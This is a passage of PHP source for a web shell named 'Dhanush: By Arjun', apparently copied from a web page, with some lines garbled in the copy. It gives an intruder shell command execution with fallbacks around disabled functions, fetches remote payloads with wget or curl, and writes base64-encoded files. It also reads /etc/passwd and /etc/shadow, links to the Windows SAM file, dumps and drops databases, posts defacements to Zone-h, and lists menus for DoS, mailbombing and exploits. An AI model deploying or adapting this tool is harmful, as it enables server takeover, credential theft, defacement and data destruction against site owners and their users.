 324       { 
 325           $num = rand() % 33; 
 326           $tmp = substr($chars, $num, 1); 
 327           $pass = $pass . $tmp; 
 328           $i++; 
 329       } 
 330           
 331       return $pass; 
 332   }
 333   function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
 334   {
 335       $ar0=explode($marqueurDebutLien, $text);
 336       $ar1=explode($marqueurFinLien, $ar0[$i]);
 337       $ar=trim($ar1[0]);
 338       return $ar;
 339   }
 340       
 341   // Zone-h Poster
 342   function ZoneH($url, $hacker, $hackmode,$reson, $site )
 343   {
 344       $k = curl_init();
 345       curl_setopt($k, CURLOPT_URL, $url);
 346       curl_setopt($k,CURLOPT_POST,true);
 347       curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
 348       curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
 349       curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
 350       $kubra = curl_exec($k);
 351       curl_close($k);
 352       return $kubra;
 353   }
 354   
 355   // Database functions
 356   function listdatabase()
 357   {   
 358       $self=$_SERVER["PHP_SELF"];
 359       ?>
 360       <br>
 361       <form>
 362       <input type="hidden" name="action" value="createDB">
 363           <table>
 364           <tr>
 365               <td><input type="text" class="box" name="dbname"></td><td><input type="submit" value="  Create Database  " name="createmydb" class="but"></td>
 366           </tr>
 367           </table>
 368       </form>
 369           <br>
 370       <?php 
 371       $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
 372       $result = mysql_query("SHOW DATABASE"); 
 373       echo "<table cellspacing=1 cellpadding=5 border=1 class=pwdtbl style=width:60%;>
 374 ";
 375 
 376       $pDB = mysql_list_dbs( $mysqlHandle );
 377       $num = mysql_num_rows( $pDB );
 378       for( $i = 0; $i < $num; $i++ ) 
 379       {
 380           $dbname = mysql_dbname( $pDB, $i );
 381           mysql_select_db($dbname,$mysqlHandle);
 382           $result = mysql_query("SHOW TABLES"); 
 383           $num_of_tables = mysql_num_rows($result);
 384           echo "<tr>
 385 ";
 386           echo "<td><a href='$self ? action = listTables & dbname = $dbname'><font size=3>$dbname</font></a> ($num_of_tables)</td>
 387 ";
 388           echo "<td><a href='$self ? action = listTables & dbname = $dbname'>Tables</a></td>
 389 ";
 390           echo "<td><a href='$self ? action = dropDB & dbname = $dbname & executequery' onClick=\"return confirm('DropDatabase\'$dbname\'?') \">Drop</a></td>
 391 ";
 392         echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>
 393 ";
 394         echo "</tr>
 395 ";
 396     }
 397     echo "</table>
 398 ";
 399     mysql_close($mysqlHandle);
 400 }
 401 function listtable() {
 402     $self = $_SERVER["PHP_SELF"];
 403     $dbserver = $_COOKIE["dbserver"];
 404     $dbuser = $_COOKIE["dbuser"];
 405     $dbpass = $_COOKIE["dbpass"];
 406     $dbname = $_GET['dbname'];
 407     echo "<div><font size=3>[ $dbname ]</font> - <font size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <fontclass=txt size=3>[ Log Out ]</font> </a></div>";
 408 ?>
 409        <br><br>
 410        <form>
 411        <input type="hidden" name="action" value="createtable">
 412        <input type="hidden" name="dbname" value="<?php echo $_GET['dbname']; ?>">
 413            <table>
 414            <tr>
 415                <td><input type="text" class="box" name="tablename"></td><td><input type="submit" value="  Create Table  " name="createmydb" class="but"></td>
 416            </tr>
 417            </table>
 418        
 419            <br>
 420            <form>
 421            <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
 422            <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
 423            <input type="hidden" value="executequery" name="action">
 424            <table>
 425                <tr>
 426                    <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
 427                </tr>
 428                <tr>
 429                    <td><input type="submit" value="Execute" class="but"></td>
 430                </tr>
 431            </table>
 432            </form>
 433            
 434        <?php
 435     $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
 436     mysql_select_db($dbname);
 437     $pTable = mysql_list_tables($dbname);
 438     if ($pTable == 0) {
 439         $msg = mysql_error();
 440         echo "<h3>Error : $msg</h3><p>
 441 ";
 442         return;
 443     }
 444     $num = mysql_num_rows($pTable);
 445     echo "<table cellspacing=1 cellpadding=5 class=pwdtbl border=1 style=width:60%;>
 446 ";
 447     for ($i = 0;$i < $num;$i++) {
 448         $tablename = mysql_tablename($pTable, $i);
 449         $result = mysql_query("select * from $tablename");
 450         $num_rows = mysql_num_rows($result);
 451         echo "<tr>
 452 ";
 453         echo "<td>
 454 ";
 455         echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'><font size=3>$tablename</font></a> ($num_rows)
 456 ";
 457         echo "</td>
 458 ";
 459         echo "<td>
 460 ";
 461         echo "<a href='$self?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>
 462 ";
 463         echo "</td>
 464 ";
 465         echo "<td>
 466 ";
 467         echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'>Data</a>
 468 ";
 469         echo "</td>
 470 ";
 471         echo "<td>
 472 ";
 473         echo "<a href='$self?action=empty&dbname=$dbname&tablename=$tablename'>Empty</a>
 474 ";
 475         echo "</td>
 476 ";
 477         echo "<td>
 478 ";
 479         echo "<a href='$self?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>
 480 ";
 481         echo "</td>
 482 ";
 483         echo "</tr>
 484 ";
 485     }
 486     echo "</table></form>";
 487     mysql_close($mysqlHandle);
 488     echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
 489 }
 490 function paramexe($n, $v) {
 491     $v = trim($v);
 492     if ($v) {
 493         echo '<span><font size=3>' . $n . ': </font></span>';
 494         if (strpos($v, "
 495 ") === false) echo '<font class=txt size=2>' . $v . '</font><br>';
 496         else echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
 497     }
 498 }
 499 $dir = getcwd();
 500 if (isset($_GET['dir'])) {
 501     $dir = $_GET['dir'];
 502 }
 503 function dis() {
 504     if (!ini_get('disable_functions')) {
 505         echo "None";
 506     } else {
 507         echo @ini_get('disable_functions');
 508     }
 509 }
 510 function mycmdexec($cmd) {
 511     global $disablefunc;
 512     $result = "";
 513     if (!empty($cmd)) {
 514         if (is_callable("exec") and !in_array("exec", $disablefunc)) {
 515             exec($cmd, $result);
 516             $result = join("
 517 ", $result);
 518         } elseif (($result = "$cmd") !== FALSE) {
 519         } elseif (is_callable("system") and !in_array("system", $disablefunc)) {
 520             $v = @ob_get_contents();
 521             @ob_clean();
 522             system($cmd);
 523             $result = @ob_get_contents();
 524             @ob_clean();
 525             echo $v;
 526         } elseif (is_callable("passthru") and !in_array("passthru", $disablefunc)) {
 527             $v = @ob_get_contents();
 528             @ob_clean();
 529             passthru($cmd);
 530             $result = @ob_get_contents();
 531             @ob_clean();
 532             echo $v;
 533         } elseif (is_resource($fp = popen($cmd, "r"))) {
 534             $result = "";
 535             while (!feof($fp)) {
 536                 $result.= fread($fp, 1024);
 537             }
 538             pclose($fp);
 539         }
 540     }
 541     return $result;
 542 }
 543 function rrmdir($dir) {
 544     if (is_dir($dir)) // ensures that we actually have a directory
 545     {
 546         $objects = scandir($dir); // gets all files and folders inside
 547         foreach ($objects as $object) {
 548             if ($object != '.' && $object != '..') {
 549                 if (is_dir($dir . '/' . $object)) {
 550                     // if we find a directory, do a recursive call
 551                     rrmdir($dir . '/' . $object);
 552                 } else {
 553                     // if we find a file, simply delete it
 554                     unlink($dir . '/' . $object);
 555                 }
 556             }
 557         }
 558         // the original directory is now empty, so delete it
 559         rmdir($dir);
 560     }
 561 }
 562 function godir($dir) {
 563     //echo $dir;
 564     $zip = new ZipArchive();
 565     $filename = basename($dir) . '.zip';
 566     // open archive
 567     if ($zip->open($filename, ZIPARCHIVE::CREATE) !== TRUE) {
 568         die("Could not open archive");
 569     } else echo "fdg";
 570     if (is_dir($dir)) // ensures that we actually have a directory
 571     {
 572         $objects = scandir($dir); // gets all files and folders inside
 573         foreach ($objects as $object) {
 574             if ($object != '.' && $object != '..') {
 575                 if (is_dir($dir . '\' . $object))
 576                   {//echo $dir . ' / ' . $object;
 577                       // if we find a directory, do a recursive call
 578                       godir($dir . '\' . $object);
 579                   }
 580                   else
 581                   {
 582                       // if we find a file, simply add it
 583                       $zip->addFile($dir . '\' . $object) or die ("ERROR: Could not add file: $key");
 584                   }
 585               }
 586           }
 587           // the original directory is now empty, so delete it
 588           $zip->addFile($dir) or die ("ERROR: Could not add file: $key");
 589       }       
 590   } 
 591   
 592   
 593               
 594   function which($pr)
 595   { 
 596       $path = execmd("which $pr"); 
 597       if(!empty($path)) 
 598           return trim($path); 
 599       else 
 600           return trim($pr); 
 601   }
 602   
 603   function cf($f,$t) 
 604   { 
 605         $w=@fopen($f,"w") or @function_exists('file_put_contents'); 
 606         if($w)
 607       { 
 608              @fwrite($w,gzinflate(base64_decode($t))) or @fputs($w,gzinflate(base64_decode($t))) or @file_put_contents($f,gzinflate(base64_decode($t))); 
 609              @fclose($w); 
 610         }
 611   }   
 612           
 613   function remotedownload($cmd,$url)
 614   { 
 615       $namafile = basename($url); 
 616       switch($cmd) 
 617       { 
 618           case 'wwget': 
 619               execmd(which('wget')." ".$url." -O ".$namafile);
 620               break; 
 621           case 'wlynx': 
 622               execmd(which('lynx')." -source ".$url." > ".$namafile);
 623               break; 
 624           case 'wfread' : 
 625               execmd($wurl,$namafile);
 626               break; 
 627           case 'wfetch' : 
 628               execmd(which('fetch')." -o ".$namafile." -p ".$url);
 629               break; 
 630           case 'wlinks' : 
 631               execmd(which('links')." -source ".$url." > ".$namafile);
 632               break; 
 633           case 'wget' : 
 634               execmd(which('GET')." ".$url." > ".$namafile);
 635               break; 
 636           case 'wcurl' : 
 637               execmd(which('curl')." ".$url." -o ".$namafile);
 638               break; 
 639           default: 
 640           break; 
 641       } 
 642       return $namafile; 
 643   }
 644   
 645   function magicboom($text)
 646   { 
 647       if (!get_magic_quotes_gpc()) 
 648           return $text; 
 649       return stripslashes($text); 
 650   }
 651 
 652 
 653 ###
 654 ###
 655 ###
 656 ###
 657 ###
 658 ###
 659 ###
 660 ###
 661 ###
 662 ###
 663 ###
 664 ###
 665 ###
 666 ###
 667 ###
 668 ###
 669 ###
 670 function execmd($cmd,$d_functions="None")
 671 {
 672     if($d_functions=="None") 
 673   {
 674       $ret=passthru($cmd); 
 675       return $ret;
 676   }
 677     $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
 678     $d_functions=str_replace(" ","",$d_functions);
 679     $dis_funcs=explode(",",$d_functions);
 680     foreach($funcs as $safe)
 681     {
 682         if(!in_array($safe,$dis_funcs)) 
 683         {
 684             if($safe=="exec")
 685             {
 686                 $ret=@exec($cmd);
 687                 $ret=join("
 688 ",$ret);
 689                 return $ret;
 690             }
 691             elseif($safe=="system")
 692             {
 693                 $ret=@system($cmd);
 694                 return $ret;
 695             }
 696             elseif($safe=="passthru")
 697             {
 698                 $ret=@passthru($cmd);
 699                 return $ret;
 700             }
 701             elseif($safe=="shell_exec")
 702             {
 703                 $ret=@shell_exec($cmd);
 704                 return $ret;
 705             }
 706             elseif($safe=="popen")
 707             {
 708                 $ret=@popen("$cmd",'r');
 709                 if(is_resource($ret))
 710                 {
 711                     while(@!feof($ret))
 712                     $read.=@fgets($ret);
 713                     @pclose($ret);
 714                     return $read;
 715                 }
 716                 return -1;
 717             }
 718 
 719             elseif($safe="proc_open")
 720             {
 721                 $cmdpipe=array(
 722                 0=>array('pipe','r'),
 723                 1=>array('pipe','w')
 724                 );
 725                 $resource=@proc_open($cmd,$cmdpipe,$pipes);
 726                 if(@is_resource($resource))
 727                 {
 728                     while(@!feof($pipes[1]))
 729                     $ret.=@fgets($pipes[1]);
 730                     @fclose($pipes[1]);
 731                     @proc_close($resource);
 732                     return $ret;
 733                 }
 734                 return -1;
 735             }
 736         }
 737     }
 738     return -1;
 739 }
 740 
 741   function getDisabledFunctions()
 742   {
 743       if(!ini_get('disable_functions'))
 744       {
 745           return "None";
 746       }
 747       else
 748       {
 749               return @ini_get('disable_functions');
 750       }
 751   }
 752   
 753   function getFilePermissions($file)
 754 {
 755     
 756 $perms = fileperms($file);
 757 
 758 if (($perms & 0xC000) == 0xC000) {
 759     // Socket
 760     $info = 's';
 761 } elseif (($perms & 0xA000) == 0xA000) {
 762     // Symbolic Link
 763     $info = 'l';
 764 } elseif (($perms & 0x8000) == 0x8000) {
 765     // Regular
 766     $info = ' - ';
 767 } elseif (($perms & 0x6000) == 0x6000) {
 768     // Block special
 769     $info = 'b';
 770 } elseif (($perms & 0x4000) == 0x4000) {
 771     // Directory
 772     $info = 'd';
 773 } elseif (($perms & 0x2000) == 0x2000) {
 774     // Character special
 775     $info = 'c';
 776 } elseif (($perms & 0x1000) == 0x1000) {
 777     // FIFO pipe
 778     $info = 'p';
 779 } else {
 780     // Unknown
 781     $info = 'u';
 782 }
 783 
 784 // Owner
 785 $info .= (($perms & 0x0100) ? 'r' : ' - ');
 786 $info .= (($perms & 0x0080) ? 'w' : ' - ');
 787 $info .= (($perms & 0x0040) ?
 788             (($perms & 0x0800) ? 's' : 'x' ) :
 789             (($perms & 0x0800) ? 'S' : ' - '));
 790 
 791 // Group
 792 $info .= (($perms & 0x0020) ? 'r' : ' - ');
 793 $info .= (($perms & 0x0010) ? 'w' : ' - ');
 794 $info .= (($perms & 0x0008) ?
 795             (($perms & 0x0400) ? 's' : 'x' ) :
 796             (($perms & 0x0400) ? 'S' : ' - '));
 797 
 798 // World
 799 $info .= (($perms & 0x0004) ? 'r' : ' - ');
 800 $info .= (($perms & 0x0002) ? 'w' : ' - ');
 801 $info .= (($perms & 0x0001) ?
 802             (($perms & 0x0200) ? 't' : 'x' ) :
 803             (($perms & 0x0200) ? 'T' : ' - '));
 804 
 805 return $info;
 806 
 807 }
 808   
 809 
 810   function yourip()
 811   {
 812       echo $_SERVER["REMOTE_ADDR"];
 813   }
 814   function phpver()
 815   {
 816       $pv=@phpversion();
 817       echo $pv;
 818   }
 819   function serverip()
 820   {
 821       echo getenv('SERVER_ADDR');
 822   }
 823   function serverport()
 824   {
 825       echo $_SERVER['SERVER_PORT'];
 826   }
 827   function  safe()
 828   {
 829       global $sm;
 830       return $sm?"ON <img src="/wp-includes/images/smilies/icon_sad.gif" alt=":(" class="wp-smiley" /> :'((MostoftheFeatureswillNotWork!) ":"OFF";
 831   }
 832   function serveradmin()
 833   {
 834       echo $_SERVER['SERVER_ADMIN'];
 835   }
 836   function systeminfo()
 837   {
 838       echo php_uname();
 839   }
 840   function curlinfo()
 841   {
 842       echo function_exists('curl_version')?(" < fontclass = txt > Enabled < / font > "):("Disabled");
 843   }
 844   function oracleinfo()
 845   {
 846       echo function_exists('ocilogon')?(" < fontclass = txt > Enabled < / font > "):("Disabled");
 847   }
 848   function mysqlinfo()
 849   {
 850       echo function_exists('mysql_connect')?(" < fontclass = txt > Enabled < / font > "):("Disabled");
 851   }
 852   function mssqlinfo()
 853   {
 854       echo function_exists('mssql_connect')?(" < fontclass = txt > Enabled < / font > "):("Disabled");
 855   }
 856   function postgresqlinfo()
 857   {
 858       echo function_exists('pg_connect')?(" < fontclass = txt > Enabled < / font > "):("Disabled");
 859   }
 860   function softwareinfo()
 861   {
 862       echo getenv("SERVER_SOFTWARE");
 863   }
 864   function download()
 865   {
 866       $frd=$_GET['download'];
 867       $prd=explode(" / ",$frd);
 868       for($i=0;$i<sizeof($prd);$i++)
 869       {
 870           $nfd=$prd[$i];
 871       }
 872       @ob_clean(); 
 873      header("Content - type : application / octet - stream"); 
 874      header("Content - length : ".filesize($nfd)); 
 875      header("Content - disposition : attachment;
 876                 filename = \"" . $nfd . "\";");
 877                 readfile($nfd);
 878                 exit;
 879             }
 880             function HumanReadableFilesize($size) {
 881                 $mod = 1024;
 882                 $units = explode(' ', 'B KB MB GB TB PB');
 883                 for ($i = 0;$size > $mod;$i++) {
 884                     $size/= $mod;
 885                 }
 886                 return round($size, 2) . ' ' . $units[$i];
 887             }
 888             function showDrives() {
 889                 global $self;
 890                 foreach (range('A', 'Z') as $drive) {
 891                     if (is_dir($drive . ':\'))
 892             {
 893                 ?>
 894                 <a class="dir" href=' < ? phpecho $self ?>?dir=<?php echo $drive . ":\"; ?>'>
 895                     <font class="txt"><?php echo $drive." : \" ?></font>
 896                 </a> 
 897                 <?php
 898             }
 899         }
 900     }
 901   function diskSpace()
 902   {
 903       echo HumanReadableFilesize(disk_total_space(" / "));
 904   }   
 905   function freeSpace()
 906   {
 907      echo HumanReadableFilesize(disk_free_space(" / "));
 908   }
 909   
 910   function thiscmd($p) 
 911   {
 912       $path = myexe('which ' . $p);
 913       if(!empty($path))
 914           return $path;
 915       return false;
 916   }
 917 
 918   function split_dir()
 919   {
 920       $de=explode(" / ",getcwd());
 921       $del=$de[0];
 922       for($count=0;$count<sizeof($de);$count++)
 923       {
 924       $imp=$imp.$de[$count].'/';
 925           
 926       echo " < ahref = ".$self." ? open = ".$imp." > ".$de[$count]." < / a > / ";
 927       }
 928       
 929   }
 930   
 931   function mysecinfo()
 932   {
 933       
 934       function myparam($n, $v) 
 935       {
 936           $v = trim($v);
 937           if($v) 
 938           {
 939               echo '<span>' . $n . ': </span>';
 940               if(strpos($v, "") === false)
 941                   echo '<font class=txt>' . $v . '</font><br>';
 942               else
 943                   echo '<pre class=ml1><font class=txt>' . $v . '</font></pre>';
 944           }
 945       }
 946   
 947       myparam('Server software', @getenv('SERVER_SOFTWARE'));
 948       if(function_exists('apache_get_modules'))
 949           myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
 950       myparam('Open base dir', @ini_get('open_basedir'));
 951       myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
 952       myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
 953       $temp=array();
 954       if(function_exists('mysql_get_client_info'))
 955           $temp[] = "MySql(".mysql_get_client_info().") ";
 956       if(function_exists('mssql_connect'))
 957           $temp[] = "MSSQL";
 958       if(function_exists('pg_connect'))
 959           $temp[] = "PostgreSQL";
 960       if(function_exists('oci_connect'))
 961           $temp[] = "Oracle";
 962       myparam('Supported databases', implode(', ', $temp));
 963       echo '<br>';
 964   
 965       if($GLOBALS['os'] == 'Linux') {
 966               myparam('Distro : ', myexe("cat / etc /*-release"));
 967                     myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='$self?passwd'>[view]</a>":'no');
 968                     myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
 969                     myparam('OS version', @file_get_contents('/proc/version'));
 970                     myparam('Distr name', @file_get_contents('/etc/issue.net'));
 971                     myparam('Where is Perl?', myexe('whereis perl'));
 972                     myparam('Where is Python?', myexe('whereis python'));
 973                     myparam('Where is gcc?', myexe('whereis gcc'));
 974                     myparam('Where is apache?', myexe('whereis apache'));
 975                     myparam('CPU?', myexe('cat /proc/cpuinfo'));
 976                     myparam('RAM', myexe('free -m'));
 977                     myparam('Mount options', myexe('cat /etc/fstab'));
 978                     myparam('User Limits', myexe('ulimit -a'));
 979                     
 980                     
 981                     if(!$GLOBALS['safe_mode']) {
 982                     $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
 983                     $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
 984                     $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
 985                     echo '<br>';
 986                     $temp=array();
 987                     foreach ($userful as $item)
 988                     if(thiscmd($item))
 989                     $temp[] = $item;
 990                     myparam('Userful', implode(', ',$temp));
 991                     $temp=array();
 992                     foreach ($danger as $item)
 993                     if(thiscmd($item))
 994                     $temp[] = $item;
 995                     myparam('Danger', implode(', ',$temp));
 996                     $temp=array();
 997                     foreach ($downloaders as $item)
 998                     if(thiscmd($item))
 999                     $temp[] = $item;
1000                     myparam('Downloaders', implode(', ',$temp));
1001                     echo '<br/>';
1002                     myparam('HDD space', myexe('df -h'));
1003                     myparam('Hosts', @file_get_contents('/etc/hosts'));
1004                     
1005                     }
1006                     } else {
1007                     echo "Password File : <a href=".$_SERVER['PHP_SELF']."?download=" . $_SERVER["WINDIR"]."
1008 epair\sam><b><font class=txt>Download password file</font></b></a><br>";
1009                     echo "Config Files :  <a href=".$_SERVER['PHP_SELF']."?open=" . $_SERVER["WINDIR"]."\system32\drivers\etc\hosts><b><font class=txt>[ Hosts ]</font></b></a> &nbsp;<a href=".$_SERVER['PHP_SELF']."?open=" . $_SERVER["WINDIR"]."\system32\drivers\etc
1010                     etworks><b><font class=txt>[ Local Network Map ]</font></b></a> &nbsp;<a href=".$_SERVER['PHP_SELF']."?open=" . $_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam><b><font class=txt>[ lmhosts ]</font></b></a><br>";
1011                     $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
1012                     echo "Open Base Dir : <font class=txt>" . $base . "</font><br>";
1013                     myparam('OS Version',myexe('ver'));
1014                     myparam('Account Settings',myexe('net accounts'));
1015                     myparam('User Accounts',myexe('net user'));
1016                     }
1017                     echo '</div>';
1018                     }
1019                     
1020                     
1021                     
1022                     function myexe($in) {
1023                     $out = '';
1024                     if (function_exists('exec')) {
1025                     @exec($in,$out);
1026                     $out = @join("
1027                     ",$out);
1028                     } elseif (function_exists('passthru')) {
1029                     ob_start();
1030                     @passthru($in);
1031                     $out = ob_get_clean();
1032                     } elseif (function_exists('system')) {
1033                     ob_start();
1034                     @system($in);
1035                     $out = ob_get_clean();
1036                     } elseif (function_exists('shell_exec')) {
1037                     $out = shell_exec($in);
1038                     } elseif (is_resource($f = @popen($in,"r"))) {
1039                     $out = "";
1040                     while(!@feof($f))
1041                     $out .= fread($f,1024);
1042                     pclose($f);
1043                     }
1044                     return $out;
1045                     }
1046                     
1047                     function exec_all($command)
1048                     {
1049                     
1050                     $output = '';
1051                     if(function_exists('exec'))
1052                     {
1053                     exec($command,$output);
1054                     $output = join("
1055                     ",$output);
1056                     }
1057                     
1058                     else if(function_exists('shell_exec'))
1059                     {
1060                     $output = shell_exec($command);
1061                     }
1062                     
1063                     else if(function_exists('popen'))
1064                     {
1065                     $handle = popen($command , "r"); // Open the command pipe for reading
1066                     if(is_resource($handle))
1067                     {
1068                     if(function_exists('fread') && function_exists('feof'))
1069                     {
1070                     while(!feof($handle))
1071                     {
1072                     $output .= fread($handle, 512);
1073                     }
1074                     }
1075                     else if(function_exists('fgets') && function_exists('feof'))
1076                     {
1077                     while(!feof($handle))
1078                     {
1079                     $output .= fgets($handle,512);
1080                     }
1081                     }
1082                     }
1083                     pclose($handle);
1084                     }
1085                     
1086                     
1087                     else if(function_exists('system'))
1088                     {
1089                     ob_start(); //start output buffering
1090                     system($command);
1091                     $output = ob_get_contents();    // Get the ouput
1092                     ob_end_clean();                 // Stop output buffering
1093                     }
1094                     
1095                     else if(function_exists('passthru'))
1096                     {
1097                     ob_start(); //start output buffering
1098                     passthru($command);
1099                     $output = ob_get_contents();    // Get the ouput
1100                     ob_end_clean();                 // Stop output buffering
1101                     }
1102                     
1103                     else if(function_exists('proc_open'))
1104                     {
1105                     $descriptorspec = array(
1106                     1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
1107                     );
1108                     $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
1109                     if(is_resource($handle))
1110                     {
1111                     if(function_exists('fread') && function_exists('feof'))
1112                     {
1113                     while(!feof($pipes[1]))
1114                     {
1115                     $output .= fread($pipes[1], 512);
1116                     }
1117                     }
1118                     else if(function_exists('fgets') && function_exists('feof'))
1119                     {
1120                     while(!feof($pipes[1]))
1121                     {
1122                     $output .= fgets($pipes[1],512);
1123                     }
1124                     }
1125                     }
1126                     pclose($handle);
1127                     }
1128                     
1129                     return(htmlspecialchars($output));
1130                     
1131                     }
1132                     
1133                     $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"OFF";
1134                     $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
1135                     ?>
1136                     <div align="center">
1137                     <a href="<?php $_SERVER['PHP_SELF'];?>"><span class=headtitle><font face="Times New Roman, Times, serif" size="6">Dhanush: By Arjun</font></span></a>
1138                     
1139                     </div>
1140                     <hr>
1141                     
1142                     <table cellpadding="0" style="width:100%;">
1143                     <tr>
1144                     <td colspan="3" style="width:85%;"><b>System Info :</b> <font class="txt"><?php systeminfo(); ?></></font></td>
1145                     <td style="width:15%;"><a href="<?php $_SERVER['PHP_SELF'];?>?com=info" target="_blank"><font class="txt"><i>Software Info</i></font></a></td>
1146                     </tr>
1147                     <tr>
1148                     <td style="width:85%;" colspan="3"><b>Software :</b> <font class="txt"><?php softwareinfo(); ?></font></td>
1149                     <td style="width:15%;"><b>Server Port :</b> <font class="txt"><?php serverport(); ?></font></td>
1150                     </tr>
1151                     
1152                     <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
1153                     <td style="width:75%;" colspan="3"><b>Uid :</b> <font class="txt"><?php echo shell_exec("id"); ?></font></td>
1154                     </tr><?php } ?>
1155                     <tr>
1156                     <td style="width:20%;"><b>Disk Space :</b> <font class="txt"><?php diskSpace(); ?></font></td>
1157                     <td style="width:20%;"><b>Free Space :</b> <font class="txt"><?php freeSpace(); ?></font></td>
1158                     
1159                     <td style="width:20%;"><b>Server IP :</b> <a href="http://whois.domaintools.com/<?php serverip(); ?>"><font class="txt"><?php serverip(); ?></font></a></td>
1160                     <td style="width:15%;"><b>Your IP :</b> <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><font class="txt"><?php yourip(); ?></font></a></td>
1161                     </tr>
1162                     
1163                     <tr>
1164                     <?php if($os == 'Windows'){ ?><td style="width:15%;"><b>View Directories :</b> <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
1165                     <?php if($os != 'Windows'){ ?><td colspan=2 style="width:20%;"><b>Current Directory :</b> <font color="#009900"><?php
1166                     $d = str_replace("\",$directorysperator,$dir);
1167                     if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
1168                     $d = str_replace("\","\",$d);
1169                     $dispd = htmlspecialchars($d);
1170                     $pd = $e = explode($directorysperator,substr($d,0,-1));
1171                     $i = 0;
1172                     foreach($pd as $b)
1173                     {
1174                     $t = '';
1175                     $j = 0;
1176                     foreach ($e as $r)
1177                     {
1178                     $t.= $r.$directorysperator;
1179                     if ($j == $i) {break;}
1180                     $j++;
1181                     }
1182                     
1183                     
1184                     $href='dir='.$t;
1185                     
1186                     echo '<a href="'.$self."?$href\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
1187                     $i++;
1188                     }
1189                     
1190                     ?></font></td><?php } ?>
1191                     <td style="width:20%;"><b>Disable functions :</b> <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
1192                     <td><b>Safe Mode :</b> <font class=txt><?php echo safe(); ?></font></td>
1193                     
1194                     </tr>
1195                     </table>
1196                     
1197                     
1198                     <table border="3" style="border-color:#333333;" width="100%;" cellpadding="1" cellspacing="8">
1199                     <tr align="center">
1200                     <td class="myfun"><a href="<?php echo $self.'?symlinkserver'?>"><font class="fun">[Symlink]</font></a></td>
1201                     <td class="myfun"><a href="<?php echo $self.'?forum'?>"><font class="fun">[Forum]</font></a></td>
1202                     <td class="myfun"><a href="<?php echo $self.'?secinfo'?>"><font class="fun">[Sec. Info]</font></a></td>
1203                     <td class="myfun"><a href="<?php echo $self.'?injector'?>"><font class="fun">[Code Inject]</font></a></td>
1204                     <td class="myfun"><a href="<?php echo $self.'?bypass';?>"><font class="fun">[Bypassers]</font></a></td>
1205                     <td class="myfun"><a href="<?php echo $self.'?fuzz'?>"><font class="fun">[Server Fuzzer]</font></a></td>
1206                     <td class="myfun"><a href="<?php echo $self.'?zone'?>"><font class="fun">[Zone-h]</font></a></td>
1207                     <td class="myfun"><a href="<?php echo $self.'?dos';?>"><font class="fun">[DoS]</font></a></td>
1208                     <td class="myfun"><a href="<?php echo $self.'?mailbomb'?>"><font class="fun">[Mail]</font></a></td>
1209                     <td class="myfun"><a href="<?php echo $self.'?tools'?>"><font class="fun">[Tools]</font></a></td>
1210                     <td class="myfun"><a href="<?php echo $self.'?phpc';?>"><font class="fun">[PHP]</font></a></td>
1211                     <td class="myfun"><a href="<?php echo $self.'?exploit'?>"><font class="fun">[Exploit]</font></a></td>
1212                     <td class="myfun"><a href="<?php echo $self.'?connect'?>"><font class="fun">[Connect]</font></a></td>
1213                     </tr>
1214                     </table>
1215                     <div style="float:left;">
1216                     <a href="javascript:history.back(1)"><font style="font-size:14;"> [Back] </font></a>&nbsp;
1217                     
1218                     
1219                     <a href="javascript:history.go(1)"><font style="font-size:14;"> [Forward] </font></a>&nbsp;
1220                     <a href=""><font style="font-size:14;"> [Refresh] </font></a>&nbsp;</div>
1221                     <table style="margin-left:270px; border-color:#333333;" border="2" width="70%;" cellpadding="1" cellspacing="8">
